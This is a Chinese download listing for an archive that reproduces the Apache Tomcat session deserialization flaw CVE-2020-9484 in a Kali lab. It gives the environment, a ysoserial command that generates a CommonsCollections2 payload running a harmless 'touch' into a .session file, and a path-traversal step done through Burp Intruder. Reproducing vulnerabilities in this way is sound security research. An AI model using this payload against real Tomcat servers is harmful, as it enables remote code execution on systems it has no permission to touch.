文件名称:CVE-2020-9484:用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞
文件大小:19.64MB
文件格式:ZIP
更新时间:2024-03-29 00:55:05
CVE-2020-9484 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞CVE-2020-9484 环境: 卡利2.0 apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar) 启动 /yourtomcatdir/bin/startup.sh 生成有效载荷 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2“ touch / tmp / 9484”> /tmp/22222.session 利用 先访问S2-053看是否启动正常: : : s2-053/ 重新访问抓包,用intruder进行路径遍历 执行命令成功: 参考: :
【文件预览】:
CVE-2020-9484-master
----README.md(1KB)
----img()
--------start.png(28KB)
--------intruder2.png(87KB)
--------ok.png(9KB)
--------intruder1.png(55KB)
--------s2-053.png(10KB)
----apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(19.48MB)